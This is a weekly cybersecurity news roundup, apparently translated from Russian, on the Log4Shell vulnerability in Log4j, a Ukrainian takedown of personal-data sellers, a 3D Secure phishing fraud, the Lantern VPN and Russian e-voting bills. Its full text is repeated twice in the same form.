We’ve collected the most important news from the world of cybersecurity this week.
- Bug 10 out of 10: Experts are alarmed by a vulnerability in the Log4j library that allows remote access to devices and servers. It is called one of the most serious exploits in recent years.
- In Ukraine, suspects in the sale of personal data bases with information of 300 million people were detained.
- Fraudsters stole more than 3 billion rubles from residents of the Russian Federation through fake payment systems.
Cyber pandemic: hackers massively exploit a vulnerability in Log4j. Experts call it the most serious bug in recent years.
Researchers have discovered a critical vulnerability in the popular Apache Log4j Java library. It potentially allows attackers to gain remote access to devices and servers without having extensive technical skills. The vulnerability is named Log4Shell.
The experts are truly alarmed. V UK National Cyber Security Center and United States Cyber and Infrastructure Security Agency called the bug potentially the most serious one found in recent years. On the Common Vulnerability Scoring System (CVSS) scale, the vulnerability received a 10 out of 10 possible points.
Log4j is used in many systems, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, and Twitter. Therefore, the scale from the operation of Log4Shell can be colossal.
According to Bloomberg, the first reports of the vulnerability appeared at the end of November. After some time, the bug began to be discussed on WeChat, and hackers exploited Log4Shell.
According to Netlab 360 experts, the attackers used an exploit to download Mirai and Muhstik malware onto devices. With their help, hackers launched cryptominers, and also used them to carry out large-scale DDoS attacks or installation of Cobalt Strike beacons to find vulnerable servers.
Apache Software Foundation Developers released an emergency update… However, against the background of the fix, new bugs were discovered, after which the specialists presented another update 2.16.0…
Almost all versions of Log4j, from 2.0-beta9 to 2.14.1, are vulnerable. The simplest and most effective method of protecting against Log4Shell is to urgently update to the latest version of the library, they say specialists.
However, experts cannot yet fully assess the scale of the consequences of the vulnerability. Bitdefender already has identified a ransomware virusabusing Log4Shell, while in Netlab stated on the discovery of at least ten hacker groups exploiting the bug. The vulnerability affected almost half of corporate networks in Russia, writes “B”…
V Check Point Research recorded more than 800,000 attacks on Log4Shell and the proliferation of new variations of the original exploit – there are already over 60 of them.
“This is clearly one of the most serious Internet vulnerabilities in recent years. When we discussed the possibility of a cyber pandemic, this is exactly what we had in mind – rapidly spreading destructive attacks, ”the experts summed up.
In Ukraine, the sale of databases of personal data with information of 300 million people was stopped
Ukrainian cyber police revealed 51 suspects in the dissemination of databases of personal data of citizens of Ukraine, Europe and the United States.
During Operation DATE, law enforcement officers seized about 100 bases with information of 300 million people for more than 90,000 GB. The information in them is relevant for 2020-2021.
The databases contained data on clients of banks and companies, information for entering e-mail, social networks, online stores, and more.
Law enforcement officers also suppressed the activities of one of the largest sites that sold personal data, including name, phone numbers and place of registration.
Microsoft fixes bug used by Emotet and Google fixes zero-day vulnerability
Microsoft specialists fixed vulnerabilityexploited by the Emotet malware. It could have been used in phishing campaigns targeting Windows users.
This week, Google Developers also presented a new version of Chrome that fixes a zero-day vulnerability under attack.
Fraudsters stole more than 3 billion rubles from Russians through fake payment systems
Group-IB experts told Cryplogger about a fraudulent scheme using fake payment systems. The damage to clients of Russian banks was estimated at 3.15 billion rubles.
According to experts, scammers began to fake 3D Secure pages used to ensure the security of online payments.
The danger of using fake payment systems through such pages is that they are quite difficult to identify, they often contain the logos of the international payment systems Visa, MasterCard or the Russian MIR and do not cause suspicion among buyers, Group-IB said.
“Attracted by fraudulent advertisements, spam mailings, or bulletin board advertisements, a buyer visits a phishing page of an online store, marketplace or online service. Having chosen a product or service, the victim enters the details of his bank card into the payment acceptance form on a fraudulent resource, ”the experts explain.
The data goes to a fraudulent server, from where the P2P services of banks are addressed, indicating one of the cybercriminals’ cards as the recipient.
Every day, Russian users made over 11,000 payments through phishing pages, for a total of 8.6 million rubles.
Lantern VPN service uses a decentralized tool to bypass possible blocking in the Russian Federation
VPN service Lantern, which could face a blockage in Russia, has responded to this threat.
“In its unjustified attempts to create a centrally controlled Internet, the Russian government is tightening the noose around the ability of Russian citizens to use modern technology to realize fundamental human rights,” the statement said.
Lantern said they were not surprised by Roskomnadzor’s interest in the service, “especially after the recent news of Russia’s aggressive attacks against the Tor network.”
“What’s more, Lantern has integrated a censorship-resistant, decentralized content distribution tool that is currently available to Russian users on desktop computers and is coming to mobile devices this month.”
As a reminder, in early December Roskomnadzor contacted companies using VPN services Betternet, Lantern, X-VPN, Cloudflare WARP, Tachyon VPN and PrivateTunnel. According to the department, they help to bypass restrictions, helping to gain access to information prohibited in the Russian Federation.
The State Duma introduced bills on uniform rules for conducting remote voting and on its cancellation
The State Duma registered law Project on uniform rules for conducting remote electronic voting (DEG) for all regions and elections at various levels.
Head of the Central Election Commission Ella Pamfilova reportedthat next year it is planned to expand the number of regions in which DEG will be used.
At the same time, a group of Communist Party deputies submitted to the State Duma for consideration bill on the abolition of the DEG in the elections in Russia.
What to read on the weekend?
Almost a year ago, it became known about an attack on American government systems, and then on many companies around the world through infected software from SolarWinds. Against the backdrop of widespread concern about the consequences of a vulnerability in Log4j, we recall the hack, which was called one of the most sophisticated and largest in recent years.
We’ve collected the most important news from the world of cybersecurity this week.
- Bug 10 out of 10: Experts are alarmed by a vulnerability in the Log4j library that allows remote access to devices and servers. It is called one of the most serious exploits in recent years.
- In Ukraine, suspects in the sale of personal data bases with information of 300 million people were detained.
- Fraudsters stole more than 3 billion rubles from residents of the Russian Federation through fake payment systems.
Cyber pandemic: hackers massively exploit a vulnerability in Log4j. Experts call it the most serious bug in recent years.
Researchers have discovered a critical vulnerability in the popular Apache Log4j Java library. It potentially allows attackers to gain remote access to devices and servers without having extensive technical skills. The vulnerability is named Log4Shell.
The experts are truly alarmed. V UK National Cyber Security Center and United States Cyber and Infrastructure Security Agency called the bug potentially the most serious one found in recent years. On the Common Vulnerability Scoring System (CVSS) scale, the vulnerability received a 10 out of 10 possible points.
Log4j is used in many systems, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, and Twitter. Therefore, the scale from the operation of Log4Shell can be colossal.
According to Bloomberg, the first reports of the vulnerability appeared at the end of November. After some time, the bug began to be discussed on WeChat, and hackers exploited Log4Shell.
According to Netlab 360 experts, the attackers used an exploit to download Mirai and Muhstik malware onto devices. With their help, hackers launched cryptominers, and also used them to carry out large-scale DDoS attacks or installation of Cobalt Strike beacons to find vulnerable servers.
Apache Software Foundation Developers released an emergency update… However, against the background of the fix, new bugs were discovered, after which the specialists presented another update 2.16.0…
Almost all versions of Log4j, from 2.0-beta9 to 2.14.1, are vulnerable. The simplest and most effective method of protecting against Log4Shell is to urgently update to the latest version of the library, they say specialists.
However, experts cannot yet fully assess the scale of the consequences of the vulnerability. Bitdefender already has identified a ransomware virusabusing Log4Shell, while in Netlab stated on the discovery of at least ten hacker groups exploiting the bug. The vulnerability affected almost half of corporate networks in Russia, writes “B”…
V Check Point Research recorded more than 800,000 attacks on Log4Shell and the proliferation of new variations of the original exploit – there are already over 60 of them.
“This is clearly one of the most serious Internet vulnerabilities in recent years. When we discussed the possibility of a cyber pandemic, this is exactly what we had in mind – rapidly spreading destructive attacks, ”the experts summed up.
In Ukraine, the sale of databases of personal data with information of 300 million people was stopped
Ukrainian cyber police revealed 51 suspects in the dissemination of databases of personal data of citizens of Ukraine, Europe and the United States.
During Operation DATE, law enforcement officers seized about 100 bases with information of 300 million people for more than 90,000 GB. The information in them is relevant for 2020-2021.
The databases contained data on clients of banks and companies, information for entering e-mail, social networks, online stores, and more.
Law enforcement officers also suppressed the activities of one of the largest sites that sold personal data, including name, phone numbers and place of registration.
Microsoft fixes bug used by Emotet and Google fixes zero-day vulnerability
Microsoft specialists fixed vulnerabilityexploited by the Emotet malware. It could have been used in phishing campaigns targeting Windows users.
This week, Google Developers also presented a new version of Chrome that fixes a zero-day vulnerability under attack.
Fraudsters stole more than 3 billion rubles from Russians through fake payment systems
Group-IB experts told Cryplogger about a fraudulent scheme using fake payment systems. The damage to clients of Russian banks was estimated at 3.15 billion rubles.
According to experts, scammers began to fake 3D Secure pages used to ensure the security of online payments.
The danger of using fake payment systems through such pages is that they are quite difficult to identify, they often contain the logos of the international payment systems Visa, MasterCard or the Russian MIR and do not cause suspicion among buyers, Group-IB said.
“Attracted by fraudulent advertisements, spam mailings, or bulletin board advertisements, a buyer visits a phishing page of an online store, marketplace or online service. Having chosen a product or service, the victim enters the details of his bank card into the payment acceptance form on a fraudulent resource, ”the experts explain.
The data goes to a fraudulent server, from where the P2P services of banks are addressed, indicating one of the cybercriminals’ cards as the recipient.
Every day, Russian users made over 11,000 payments through phishing pages, for a total of 8.6 million rubles.
Lantern VPN service uses a decentralized tool to bypass possible blocking in the Russian Federation
VPN service Lantern, which could face a blockage in Russia, has responded to this threat.
“In its unjustified attempts to create a centrally controlled Internet, the Russian government is tightening the noose around the ability of Russian citizens to use modern technology to realize fundamental human rights,” the statement said.
Lantern said they were not surprised by Roskomnadzor’s interest in the service, “especially after the recent news of Russia’s aggressive attacks against the Tor network.”
“What’s more, Lantern has integrated a censorship-resistant, decentralized content distribution tool that is currently available to Russian users on desktop computers and is coming to mobile devices this month.”
As a reminder, in early December Roskomnadzor contacted companies using VPN services Betternet, Lantern, X-VPN, Cloudflare WARP, Tachyon VPN and PrivateTunnel. According to the department, they help to bypass restrictions, helping to gain access to information prohibited in the Russian Federation.
The State Duma introduced bills on uniform rules for conducting remote voting and on its cancellation
The State Duma registered law Project on uniform rules for conducting remote electronic voting (DEG) for all regions and elections at various levels.
Head of the Central Election Commission Ella Pamfilova reportedthat next year it is planned to expand the number of regions in which DEG will be used.
At the same time, a group of Communist Party deputies submitted to the State Duma for consideration bill on the abolition of the DEG in the elections in Russia.
What to read on the weekend?
Almost a year ago, it became known about an attack on American government systems, and then on many companies around the world through infected software from SolarWinds. Against the backdrop of widespread concern about the consequences of a vulnerability in Log4j, we recall the hack, which was called one of the most sophisticated and largest in recent years.
